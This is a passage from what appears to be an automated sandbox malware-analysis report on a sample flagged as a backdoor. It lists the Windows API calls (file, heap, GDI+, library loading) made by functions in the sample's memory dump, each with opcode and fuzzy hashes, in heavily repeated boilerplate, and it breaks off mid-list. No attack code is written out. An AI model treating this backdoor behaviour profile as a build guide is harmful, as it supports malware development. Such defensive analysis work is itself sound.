                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
                                                • Instruction ID: a7be6e160c0a797ba1881c293bdaaf7ad78b2222fe351d72cdc7b07636417dc5
                                                • Opcode Fuzzy Hash: 6a162415e2bcb2945a581a228f63db78d4f29f335d9919f6a80d2681911ab4ea
                                                • Instruction Fuzzy Hash: 6F21F6B1510749EFD7308F24C885BA7B7F8EB49764F00492EF6E582291C378AC448B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,007D7547,?,?,?,?), ref: 007D9D7C
                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 007D9E2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$BuffersFlushTime
                                                • String ID:
                                                • API String ID: 1392018926-0
                                                • Opcode ID: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
                                                • Instruction ID: e840f13a46dd9446670ee9992a2389912be2122b977507339445bbe795280b21
                                                • Opcode Fuzzy Hash: b86b4adf935ba36d6544b0f94ac9c314f3d12b9ffbae2b681aaf8a50a1191626
                                                • Instruction Fuzzy Hash: E221F671249286ABC714DE25C851AABBBF5AF55304F04081EB5C083241D32DDA0CCBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 007FA4B8
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007FA4C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
                                                • Instruction ID: ea0cd2124e9baba6c5fcda9e919fe1f5e22ad9b8828e52549f8e9eda983a4e04
                                                • Opcode Fuzzy Hash: e8ce4a11a1838d1f1d414957262536329026d2f26844ec795a1ff509840b4ac6
                                                • Instruction Fuzzy Hash: D5113A73601268ABDF25DF2CEC4887B7395BB943207164520FE19AB354EA78DC01C6D2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,007D9B35,?,?,00000000,?,?,007D8D9C,?), ref: 007D9BC0
                                                • GetLastError.KERNEL32 ref: 007D9BCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
                                                • Instruction ID: dc0bc67f240c72d446fa22e36d5d8843156aba400e8971eb4bffcb594e4046a5
                                                • Opcode Fuzzy Hash: 80c0cf2aa6f125c39e947333a5f5bdaf7ef97ce7bd4896d80136b06b49406475
                                                • Instruction Fuzzy Hash: C60104B13042059B8B08CE65AD8497EB3B9AFC0721B15462FFA1383390CA79D8059B20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 007D9E76
                                                • GetLastError.KERNEL32 ref: 007D9E82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastPointer
                                                • String ID:
                                                • API String ID: 2976181284-0
                                                • Opcode ID: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
                                                • Instruction ID: 75938dffe432844f67b484ad16b223018693ea760d0e47112c66c9efc0085c70
                                                • Opcode Fuzzy Hash: 51398c6ff1c58763c3af37eeb549334dea939c767c2101533797e0c694d1ebc0
                                                • Instruction Fuzzy Hash: F801B5723056006BEB34DF29DD4876BB7EDAB84314F144A3FB246C3780DA79DC488610
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F8627
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00810F50,007DCE57,?,?,?,?,?,?), ref: 007F8663
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Heap$AllocAllocate_free
                                                • String ID:
                                                • API String ID: 2447670028-0
                                                • Opcode ID: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
                                                • Instruction ID: 95b363fd543ce2c126059d45235283deac81dd608c2cfd378de41eff7ff5652f
                                                • Opcode Fuzzy Hash: 5cb99ee6cae117ca2133a654b7e02d974d938296570ac6019fb9b1d8f6ffc801
                                                • Instruction Fuzzy Hash: 2AF0C23220511DA6DBE12B21AC09B7F27589FD1BB0F284215FB14DA393DF2CC80095A7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,?), ref: 007E0915
                                                • GetProcessAffinityMask.KERNEL32(00000000), ref: 007E091C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrentMask
                                                • String ID:
                                                • API String ID: 1231390398-0
                                                • Opcode ID: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
                                                • Instruction ID: 1352f4b084a0b935ddc22d547cd580aea36a20040430f29959ccc788bc23813b
                                                • Opcode Fuzzy Hash: 7c9154e0f67ee4c50b7859104710997288f797fbbee132adbe43f300b0e9f091
                                                • Instruction Fuzzy Hash: 16E09B32A12145BBBF05CEA59C044BB739DEB0C2107104179A806D3103F678FD4186E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA458
                                                • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,007DA27A,?,?,?,007DA113,?,00000001,00000000,?,?), ref: 007DA489
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
                                                • Instruction ID: ec23b3f99013ceff26b07e8f0d1722076c11de68727335270a11263c37a729b9
                                                • Opcode Fuzzy Hash: 0b565a8192d3a50fec38e170e25c4f71a85bff4c5a6b9568a1a33b3eecb0b61a
                                                • Instruction Fuzzy Hash: 07F0A03124124DBBDF016F60DC05FDA376CBB08381F048056BC8886261DB7ACAA8AA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText_swprintf
                                                • String ID:
                                                • API String ID: 3011073432-0
                                                • Opcode ID: d02f916f0f987c734cb1dc526c1d8c9875e65367988a84867e2208cb89171ebe
                                                • Instruction ID: b86bce6cfe27e7a1391e24f01d2df9ec88ec75f6c7eb30c18932ca0b27b8e64f
                                                • Opcode Fuzzy Hash: d02f916f0f987c734cb1dc526c1d8c9875e65367988a84867e2208cb89171ebe
                                                • Instruction Fuzzy Hash: 40F0EC71501388FBEB21AB71DC0BF9D376DAB08745F040996B601571B1DD796E604761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA13E
                                                • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,007D984C,?,?,007D9688,?,?,?,?,00801FA1,000000FF), ref: 007DA16C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 3044daa490ad1edef040af772a55fad2ab11058a532d9ba6e7d25458c89fa820
                                                • Instruction ID: 649b4f6cb4527e47382fc1b874e42392aab33d85a593e499bc61acdc02a12625
                                                • Opcode Fuzzy Hash: 3044daa490ad1edef040af772a55fad2ab11058a532d9ba6e7d25458c89fa820
                                                • Instruction Fuzzy Hash: B1E0923564120DFBDB11AF60DC45FE9777CBB08381F484066B888D3160DB66DD94AA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdiplusShutdown.GDIPLUS(?,?,?,?,00801FA1,000000FF), ref: 007EA3D1
                                                • OleUninitialize.OLE32(?,?,?,?,00801FA1,000000FF), ref: 007EA3D6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: GdiplusShutdownUninitialize
                                                • String ID:
                                                • API String ID: 3856339756-0
                                                • Opcode ID: 6e96a93e8157435f22b2bf0e09fc10b61f048006e0ce75ac1c9904cc1affa1ea
                                                • Instruction ID: 187a7cf63562499106b46eafe161c19f7e81183cb8916ff57846604d0fface92
                                                • Opcode Fuzzy Hash: 6e96a93e8157435f22b2bf0e09fc10b61f048006e0ce75ac1c9904cc1affa1ea
                                                • Instruction Fuzzy Hash: E6F03072518655DFC7109B4DDD05B59FBADFB89B20F04476AF41983760CF786800CA91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1A5
                                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,007DA189,?,007D76B2,?,?,?,?), ref: 007DA1D1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 14c6d479bcc3bf11c7901d2df70434594fd0ef1f472dc123b44827120fda65b4
                                                • Instruction ID: d0645e11baa533cfbc04b21d6167f185061dd24fd9596f61d52f004ce5cfc6cb
                                                • Opcode Fuzzy Hash: 14c6d479bcc3bf11c7901d2df70434594fd0ef1f472dc123b44827120fda65b4
                                                • Instruction Fuzzy Hash: 7CE06D35501128ABDB20AA689C09BD9B77CBB083A1F0442A2BD44E3290DA75DD449AE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 007E00A0
                                                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,007DEB86,Crypt32.dll,00000000,007DEC0A,?,?,007DEBEC,?,?,?), ref: 007E00C2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: DirectoryLibraryLoadSystem
                                                • String ID:
                                                • API String ID: 1175261203-0
                                                • Opcode ID: 84a7d57b56959d2391fa9d289ffad15d20f34203d60d63abfcb262edb338a36c
                                                • Instruction ID: 9870f2bf43929fec3547b680b8fad0aa1e41aeaf072f542308f281c33b0684a7
                                                • Opcode Fuzzy Hash: 84a7d57b56959d2391fa9d289ffad15d20f34203d60d63abfcb262edb338a36c
                                                • Instruction Fuzzy Hash: 9FE0127690255CAADB619AA59C09FD6776CFF0D392F0404A6B948D3104DAB49A848BE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30
                                                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 007E9B37
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: BitmapCreateFromGdipStream
                                                • String ID:
                                                • API String ID: 1918208029-0
                                                • Opcode ID: 5345c47e3e4aba66376bd9af367d9665036040d1bf721cb246798f33c3f1ad93
                                                • Instruction ID: 57b6edf6704ef0cef6344256f7ad4da7a39d94b81f4bb34f8c72ba63c8a0fb5f
                                                • Opcode Fuzzy Hash: 5345c47e3e4aba66376bd9af367d9665036040d1bf721cb246798f33c3f1ad93
                                                • Instruction Fuzzy Hash: E7E0EDB2902218EBDB50DF99D905699B7ECEB08321F20845BE99593700E6B56E049B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007F329A: try_get_function.LIBVCRUNTIME ref: 007F32AF
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007F217A
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 007F2185
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 641f3e41c02c0dba7b39520f53f9ab26b89a96cff389e1c2eeb8fbd4a0776dce
                                                • Instruction ID: c80785df67374696d0d3852fc0bbc846f1cf9e6f2b4b5a2e3a8061be58afd124
                                                • Opcode Fuzzy Hash: 641f3e41c02c0dba7b39520f53f9ab26b89a96cff389e1c2eeb8fbd4a0776dce
                                                • Instruction Fuzzy Hash: 8BD0A72510830E647D4836B06C5A0F92344BD51B703E00B45E330C53D3EE1D4407A01A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • DloadLock.DELAYIMP ref: 007EDC73
                                                • DloadProtectSection.DELAYIMP ref: 007EDC8F
                                                  • Part of subcall function 007EDE67: DloadObtainSection.DELAYIMP ref: 007EDE77
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
